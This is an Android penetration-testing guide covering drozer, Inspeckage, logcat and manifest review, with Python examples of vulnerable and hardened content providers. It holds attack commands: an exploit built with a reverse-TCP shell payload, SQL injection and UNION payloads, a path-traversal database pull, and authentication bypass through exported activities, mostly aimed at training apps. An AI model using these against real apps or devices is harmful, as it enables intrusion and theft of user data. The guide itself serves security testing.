```bash
# build drozer from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
make deb
# or : install the release package
wget https://github.com/WithSecureLabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb
dpkg -i drozer_2.4.4.deb

# install drozer agent on device
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
adb install drozer-agent-2.3.4.apk

# open drozer agent app on device : turn the embedded server "on"
adb forward tcp:31415 tcp:31415
drozer console connect
```
Commands
```bash
# on drozer console
drozer console connect

'''Info Gathering / Basics'''
# list modules
list
# get packages list
run app.package.list -f $filter
# get basic info of package
run app.package.info -a $package_app
# view copied text via clipboard
run post.capture.clipboard
# dump AndroidManifest.xml file
run app.package.manifest $package_app
# identify weaknesses (exported components, debuggable flag)
run app.package.attacksurface $package_app
# list exported activities / find private activities
run app.activity.info -a $package_app
# find browsable activities
run scanner.activity.browsable
# find if app allows its data to be backed up
run app.package.backup -f $package_app
# launch an exported activity directly (skips whatever in-app navigation normally leads to it)
run app.activity.start --component $package_app $package_app.$activity

'''WebView'''
# find if webview is exploitable (JavaScript bridge exposed with addJavascriptInterface)
run scanner.misc.checkjavascriptbridge -a $package_app

'''Content providers'''
# get infos about content providers
run app.provider.info -a $package_app
# content provider vulnerabilities
run scanner.provider.injection -a $package_app
run scanner.provider.traversal -a $package_app
# Database-backed Content Providers (Data Leakage)
run scanner.provider.finduris -a $package_app
# query accessible content URIs
run app.provider.query content://$content
# Database-backed Content Providers (SQLi) : a lone quote raises an SQLite syntax error
# when the provider concatenates the projection / selection into its query
run app.provider.query content://$accessible_content --projection "'"
run app.provider.query content://$accessible_content --selection "'"

'''Services'''
# list services
run app.service.info -a $package_app
# interact with service
# app.service.send   Send a Message to a service, and display the reply
# app.service.start  Start Service
# app.service.stop   Stop Service
run app.service.send $package_app $package_app.$service --msg 2354 9234 1 --extra string $package_app.PIN 1337 --bundle-as-obj
```
```bash
'''Broadcast Receivers'''
# broadcast receivers
run app.broadcast.info                  # lists all broadcast receivers on the device
# check for app
run app.broadcast.info -a $package_app
# interactions
# app.broadcast.info   Get information about broadcast receivers
# app.broadcast.send   Send broadcast using an intent
# app.broadcast.sniff  Register a broadcast receiver that can sniff particular intents
# e.g. : send SMS on app (GoatDroid FourGoats) ; --component takes the package, then the receiver class
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"
```
```bash
'''Debug'''
# find debuggable apps
run app.package.debuggable
# You can run commands as that app if it is debuggable (from an adb shell)
shell@android:/ $ run-as $package_app

'''Exploits / Shellcode'''
# on host terminal
drozer exploit list
drozer shellcode list
# example : CVE-2010-1807 (WebKit floating-point parsing bug)
drozer exploit build exploit.remote.webkit.nanparse --payload weasel.reverse_tcp.armeabi --server 10.0.2.2:31415 --push-server 127.0.0.1:31415 --resource /home.html
```
PID Cat
pidcat is a wrapper around adb logcat that shows only the log entries of a given application package, which makes sensitive data written to the log easy to spot. The app does not have to be debuggable: logcat is readable over adb for every app.
Inspeckage
Xposed module that instruments an application at run time. Information gathering :
Exported and Non-exported Activities, Content Providers, Broadcast Receivers and Services;
Check if the app is debuggable or not;
Version, UID and GIDs;
Hooks
With the hooks, we can see what the application is doing in real time:
Shared Preferences (log and file);
Serialization;
Crypto;
Hashes;
SQLite;
HTTP (an HTTP proxy tool is still the best alternative);
File System;
Miscellaneous (Clipboard, URL.Parse());
WebView;
IPC.
```bash
adb install mobi.acpm.inspeckage.apk
# go to the device : launch inspeckage (needs the Xposed framework) and pick the target app
# open web browser : http://127.0.0.1:8008 on mobile
# or from the host : adb forward tcp:8008 tcp:8008, then browse to http://127.0.0.1:8008
```
Manual
Exported Activities / Service
One time, I used an exported activity as a very good way to bypass the MFA on an app.
In AndroidManifest.xml, check for exported activities :
```bash
cat AndroidManifest.xml | grep 'exported="true"'
# true : activity can be launched by any other application.
# false : only the application itself can launch it.
# caveat : for apps targeting Android < 12 (API < 31), a component with no android:exported
# attribute but with an <intent-filter> is exported by default, so review the intent filters too
# launch exported activity
adb shell am start -n $package_name/.$activity
# or drozer : app.activity.start
```
Exploit Service (1)
When a service is exported without any permission restriction, any application can bind to the service and access the function implemented in the service.
```bash
dz> run app.service.send com.mwr.example.sieve com.mwr.example.sieve.CryptoService --msg 3452 2 3 --extra string com.mwr.example.sieve.KEY testpassword --extra string com.mwr.example.sieve.STRING "string to be encrypted" --bundle-as-obj
```
--msg takes exactly three integers: the Message fields what, arg1 and arg2 that the service's Handler switches on. Read the service's handleMessage() code to find the values it expects, and pass any further data it reads from the Message with --extra (--bundle-as-obj puts the extras in the Message's obj field instead of its data bundle, so match whichever one the code reads).
Vulnerable Content Provider
A content provider component supplies data from one application to others on request. Such requests are handled by the methods of the ContentResolver class. A content provider can use different ways to store its data and the data can be stored in a database, in files, or even over a network.
```bash
cat AndroidManifest.xml | grep "<provider"
# search for :
# android:enabled="true"
# android:exported="true"
# check the permissions (android:permission, android:readPermission, android:writePermission) and android:grantUriPermissions
# drozer console
run app.provider.info -a $package_app
# check source code for content providers URI (the authority plus the paths registered in the UriMatcher)
# query it :
run app.provider.query $content_provider_URI --vertical
```
SQLi's
SQLi on a content provider connected to a DB, through the projection (or selection) parameter: drozer's --projection "'" above yields an SQLite syntax error when the provider concatenates it into the query, and a projection such as "* FROM sqlite_master--" then enumerates the tables. The command below is a different bug of Sieve, a directory traversal in its file-backed FileBackupProvider, used to pull the app's private SQLite database off the device (drozer's app.provider.download module saves the file straight to the host):
```bash
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/../../../../data/data/com.mwr.example.sieve/databases/database.db > database.db
```
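To show what the two probes actually exercise, here is an added example, not code from this page nor from the Sieve app, that models a provider's query() and openFile() with Python's sqlite3 and os modules: the vulnerable versions paste the caller's projection/selection into the SQL and join the URI path onto the provider's directory, the hardened versions whitelist columns, bind the filter value and canonicalise the path. The table names, rows and the temporary sandbox directory are constructed for the example.

```python
import os
import sqlite3
import tempfile

# Constructed stand-in for an app's private database.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE notes (_id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE passwords (_id INTEGER PRIMARY KEY, service TEXT, password TEXT);
        INSERT INTO notes VALUES (1, 'shopping', 'milk, eggs');
        INSERT INTO passwords VALUES (1, 'mail', 'hunter2');
    """)
    return con

# Vulnerable query(): the caller's projection and selection are pasted into the SQL,
# so --projection "'" gives a syntax error and --projection "* FROM sqlite_master--"
# or a UNION in --selection reads tables the provider never meant to expose.
def vulnerable_query(con, projection=None, selection=None):
    sql = f"SELECT {', '.join(projection) if projection else '*'} FROM notes"
    if selection:
        sql += f" WHERE {selection}"
    return con.execute(sql).fetchall()

ALLOWED_COLUMNS = ("_id", "title", "body")

# Hardened query(): columns are checked against a whitelist (the job of SQLiteQueryBuilder's
# setProjectionMap/setStrict on Android) and the filter value is a bound parameter.
def hardened_query(con, projection=None, where_column=None, where_value=None):
    cols = tuple(projection) if projection else ALLOWED_COLUMNS
    for col in cols + ((where_column,) if where_column else ()):
        if col not in ALLOWED_COLUMNS:
            raise ValueError(f"column not permitted: {col!r}")
    sql, args = f"SELECT {', '.join(cols)} FROM notes", ()
    if where_column:
        sql, args = sql + f" WHERE {where_column} = ?", (where_value,)
    return con.execute(sql, args).fetchall()

# Constructed app sandbox: files/ is what the provider should serve, databases/ is not.
def make_fs():
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "files"))
    os.makedirs(os.path.join(root, "databases"))
    with open(os.path.join(root, "files", "backup.txt"), "w") as f:
        f.write("public backup")
    with open(os.path.join(root, "databases", "database.db"), "w") as f:
        f.write("SECRET DB")
    return os.path.join(root, "files")

# Vulnerable openFile(): new File(filesDir, uri.getPath()) with no canonicalisation,
# so ../databases/database.db walks out of the directory.
def vulnerable_open_file(files_dir, uri_path):
    with open(os.path.join(files_dir, uri_path.lstrip("/")), "rb") as f:
        return f.read()

# Hardened openFile(): resolve the path and refuse anything outside the base directory.
def hardened_open_file(files_dir, uri_path):
    base = os.path.realpath(files_dir)
    target = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"{uri_path!r} resolves outside {base}")
    with open(target, "rb") as f:
        return f.read()

if __name__ == "__main__":
    con = make_db()
    print(vulnerable_query(con, ["* FROM sqlite_master--"]))
    print(vulnerable_query(con, selection="1=1 UNION SELECT _id, service, password FROM passwords"))
    print(vulnerable_open_file(make_fs(), "../databases/database.db"))
```

The hardened query deliberately does not accept a raw selection string at all: once the caller can hand you an SQL fragment, escaping it is the wrong fight, so expose a column/value pair and bind the value.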
Insecure Logging
Sensitive information (usernames, passwords, session tokens and other user data) is written to the system log. Everything that lands in logcat is readable by anyone with adb access to the device (and, before Android 4.1, by any app holding the READ_LOGS permission), so a log statement that prints a credential is as good as storing it in plain text.
```bash
# make sure you installed frida
# find pid of app
frida-ps -Uai
# get logs of the app :
adb logcat --pid=2244
# or without frida : look the pid up with ps (ps -A on Android 8+) and pass it to --pid
adb logcat --pid="$(adb shell ps -A | grep $package_name | awk '{print $2}')"
# find logged infos by the app when you log in, etc
adb logcat --pid=2244 | grep -i "password"
```
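As an added example (not from the page), the grep above turned into a small scanner: it parses threadtime-format logcat records, filters by pid the way --pid does, and flags messages that match typical secret patterns. The log lines are constructed for the example, not captured from a real app.

```python
import re

# Constructed sample of `adb logcat -v threadtime` output (not captured from a real
# device); pid 2244 stands in for the target app, 1337 for an unrelated process.
SAMPLE_LOGCAT = """\
03-14 10:22:01.123  2244  2244 D LoginActivity: attempting login for user=alice
03-14 10:22:01.130  2244  2244 D LoginActivity: password=Sup3rSecret!
03-14 10:22:01.201  2244  2260 I OkHttp  : --> POST https://api.example.test/v1/auth
03-14 10:22:01.202  2244  2260 I OkHttp  : Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.e30.abc123
03-14 10:22:02.010  2244  2244 V SessionMgr: session_token=3f9c2a7d6b1e4c08
03-14 10:22:02.011  2244  2244 V SessionMgr: cache warmed (13 entries)
03-14 10:22:03.500  1337  1337 I SystemUI: battery level 87%
"""

# threadtime record: date time pid tid level tag: message
LOGCAT_RE = re.compile(
    r"^(?P<date>\d{2}-\d{2}) (?P<time>[\d:.]+)\s+(?P<pid>\d+)\s+(?P<tid>\d+)\s+"
    r"(?P<level>[VDIWEF]) (?P<tag>[^:]+?)\s*: (?P<msg>.*)$"
)

# What a secret tends to look like once an app logs it; extend per target.
SENSITIVE_PATTERNS = {
    "password": re.compile(r"(?i)\b(pass(word|wd)?|pwd)\s*[=:]\s*\S+"),
    "bearer_token": re.compile(r"(?i)\bbearer\s+[A-Za-z0-9._-]+"),
    "session_token": re.compile(r"(?i)\b(session|auth|access)[_-]?token\s*[=:]\s*\S+"),
    "pin": re.compile(r"(?i)\bpin\s*[=:]\s*\d{4,8}\b"),
}

def parse_line(line):
    """Split one threadtime line into fields, or None for lines that are not log records."""
    m = LOGCAT_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["pid"], rec["tid"] = int(rec["pid"]), int(rec["tid"])
    return rec

def find_sensitive(logcat_text, pid=None):
    """(kind, tag, message) for every record that matches a secret pattern.
    pid narrows the scan to one process, like `adb logcat --pid=<pid>` does."""
    findings = []
    for line in logcat_text.splitlines():
        rec = parse_line(line)
        if rec is None or (pid is not None and rec["pid"] != pid):
            continue
        for kind, pattern in SENSITIVE_PATTERNS.items():
            if pattern.search(rec["msg"]):
                findings.append((kind, rec["tag"], rec["msg"]))
    return findings

if __name__ == "__main__":
    for kind, tag, msg in find_sensitive(SAMPLE_LOGCAT, pid=2244):
        print(f"[{kind}] {tag}: {msg}")
```

Feed it real output with `adb logcat -v threadtime -d > app.log` and `find_sensitive(open("app.log").read(), pid=...)`; the Authorization header line is the case a plain `grep password` misses.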
Input Validation Issues
Input data from users, such as login credentials, user input, and other user-generated data, is not properly validated before being used by the application. Check for :
SQLi
XSS
Code Injection
BOF
File Inclusion
etc.
Access Control Issues
Access controls, such as authentication and authorization mechanisms, are not properly implemented or enforced. This can lead to unauthorized access to sensitive information, data theft, and other security breaches.
Try to access "sensitive" activities from outside the app :
```bash
# list activities with adb
adb shell dumpsys package $package_name | grep -i Activity
# use adb
adb shell am start -n $app_name/.$activity
# let's try to reach the data through the content provider
adb shell content query --uri content://jakhar.aseem.diva.provider.notesprovider/notes/
# e.g. : jump straight to a post-login activity (InsecureBankv2)
adb shell am start -n com.android.insecurebankv2/com.android.insecurebankv2.PostLogin
```
Deep links are basically hyperlinks that allow users to directly open specific views inside an Android application. Examine the AndroidManifest.xml file and search for android:scheme attributes inside <data> tags (within an intent-filter carrying the VIEW action and the BROWSABLE category) to find the deep links defined.
```bash
cat AndroidManifest.xml | grep "<data"
# locate scheme, host and pathPrefix
# query
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" $package_name
```
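The manifest checks in this section (exported activities and services, providers, the <receiver> tags covered under Insecure Broadcast Receiver, the debuggable and backup flags, and the <data> tags for deep links) can be automated. The following is an added example, not the page's or drozer's code: it applies Android's default-export rules to a decoded AndroidManifest.xml, lists the permission-less exported components with an adb command to reach each, extracts the deep-link URLs and reads the debuggable/allowBackup flags. The manifest, package and component names are constructed for the example.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # namespace of every android: attribute

# Constructed manifest in decoded form (as `apktool d` or drozer's app.package.manifest
# prints it); the package and component names are invented for this example.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.target">
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PostLoginActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="target" android:host="open" android:pathPrefix="/account"/>
      </intent-filter>
    </activity>
    <service android:name=".CryptoService" android:exported="true"/>
    <receiver android:name=".SmsReceiver">
      <intent-filter><action android:name="com.example.target.SEND_SMS"/></intent-filter>
    </receiver>
    <receiver android:name=".ProtectedReceiver" android:exported="true" android:permission="com.example.target.INTERNAL"/>
    <provider android:name=".NotesProvider" android:authorities="com.example.target.notes" android:exported="true"/>
    <provider android:name=".PrivateProvider" android:authorities="com.example.target.private"/>
  </application>
</manifest>
"""

def _attr(elem, name):
    return elem.get(A + name)

def is_exported(elem, kind, target_sdk):
    """Effective exported state, applying Android's defaults when the attribute is absent."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit == "true"
    if kind == "provider":
        return target_sdk < 17  # providers were exported by default only below API 17
    # activity/service/receiver: an <intent-filter> implies exported=true. Apps targeting
    # API 31+ must declare the attribute (install fails otherwise), so this is the <31 rule.
    return elem.find("intent-filter") is not None

def app_flags(manifest_xml):
    """debuggable and allowBackup (allowBackup defaults to true when not declared)."""
    app = ET.fromstring(manifest_xml).find("application")
    return {"debuggable": _attr(app, "debuggable") == "true",
            "allowBackup": _attr(app, "allowBackup") != "false"}

def audit(manifest_xml, target_sdk=30):
    """One record per component: effective exported state, guarding permission, actions."""
    root = ET.fromstring(manifest_xml)
    pkg, report = root.get("package"), []
    for kind in ("activity", "service", "receiver", "provider"):
        for elem in root.find("application").findall(kind):
            name = _attr(elem, "name")
            report.append({
                "kind": kind, "name": pkg + name if name.startswith(".") else name,
                "exported": is_exported(elem, kind, target_sdk),
                "permission": _attr(elem, "permission"),
                "authorities": _attr(elem, "authorities"),
                "actions": [_attr(a, "name") for a in elem.iter("action")]})
    return report

def deep_links(manifest_xml):
    """scheme://host/path for every VIEW+BROWSABLE intent-filter. Each <data> is taken on
    its own; Android also merges attributes across sibling <data> elements (not modelled)."""
    urls = []
    for f in ET.fromstring(manifest_xml).iter("intent-filter"):
        actions = {_attr(a, "name") for a in f.findall("action")}
        cats = {_attr(c, "name") for c in f.findall("category")}
        if "android.intent.action.VIEW" in actions and "android.intent.category.BROWSABLE" in cats:
            for d in f.findall("data"):
                if _attr(d, "scheme"):
                    path = _attr(d, "path") or _attr(d, "pathPrefix") or _attr(d, "pathPattern") or ""
                    urls.append(f"{_attr(d, 'scheme')}://{_attr(d, 'host') or ''}{path}")
    return urls

def attack_surface(manifest_xml, target_sdk=30):
    """Exported components with no permission guard, each with an adb command to reach it."""
    pkg, surface = ET.fromstring(manifest_xml).get("package"), []
    for c in audit(manifest_xml, target_sdk):
        if not c["exported"] or c["permission"]:
            continue
        target = f"{pkg}/{c['name']}"
        if c["kind"] == "activity":
            cmd = f"adb shell am start -n {target}"
        elif c["kind"] == "service":
            cmd = f"adb shell am startservice -n {target}"
        elif c["kind"] == "receiver":
            cmd = f"adb shell am broadcast -a {c['actions'][0] if c['actions'] else '<action>'} -n {target}"
        else:
            cmd = f"adb shell content query --uri content://{c['authorities']}"
        surface.append((c["kind"], c["name"], cmd))
    return surface

if __name__ == "__main__":
    print(app_flags(SAMPLE_MANIFEST), deep_links(SAMPLE_MANIFEST))
    for kind, name, cmd in attack_surface(SAMPLE_MANIFEST):
        print(f"{kind:9} {cmd}")
```

Note that MainActivity and SmsReceiver come out as exported although neither declares android:exported, which is exactly the case a `grep 'exported="true"'` misses; run it with the app's real targetSdkVersion, since that decides the provider default.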
WebView Attacks
WebView is a view that allows an application to load web pages within it. Internally it uses a web rendering engine: WebKit before Android 4.4, Chromium from 4.4 on. A WebView runs within the context of the application that loaded it, so whatever the page inside it can reach (local files, JavaScript interfaces exposed with addJavascriptInterface) it reaches with that application's UID and permissions. To load external web pages from the Internet, the application needs the INTERNET permission (android.permission.INTERNET) in its AndroidManifest.xml file.
Accessing sensitive local resources through file scheme
When an Android application loads a WebView from a user-controlled URL, the user can also point it at file:// URLs and read files from the device in the context of the target application, e.g. its private data under /data/data/<package>/. Whether this works depends on the WebSettings: setAllowFileAccess() defaults to true for apps targeting API 29 and below and to false from API 30, and getting the file contents back into a page (rather than just rendered) additionally needs setAllowFileAccessFromFileURLs() or setAllowUniversalAccessFromFileURLs(), both off by default since API 16.
Insecure Broadcast Receiver
BroadcastReceiver is an Android component that listens to system-wide broadcast events or intents. For example, when your phone's battery is running low, a broadcast indicating the low-battery condition is sent; some apps could be configured to listen for this broadcast and lower their power consumption, maybe dim your screen, etc.
How to Exploit
Examine AndroidManifest.xml
Check for <receiver> tags
Check in the code where the broadcast receiver is, for the onReceive() function, and see how it handles the broadcasts it receives: which action and extras it expects, and whether it checks who sent them.
Try to exploit it by sending a crafted broadcast carrying those extras (adb shell am broadcast, or drozer's app.broadcast.send).
If an app expects a broadcast receiver to catch an intent and then show authenticated activities, that broadcast is normally only generated after login. But after code review, an attacker can send that intent manually using drozer and reach the post-login screens without authenticating. Sample broadcast receiver: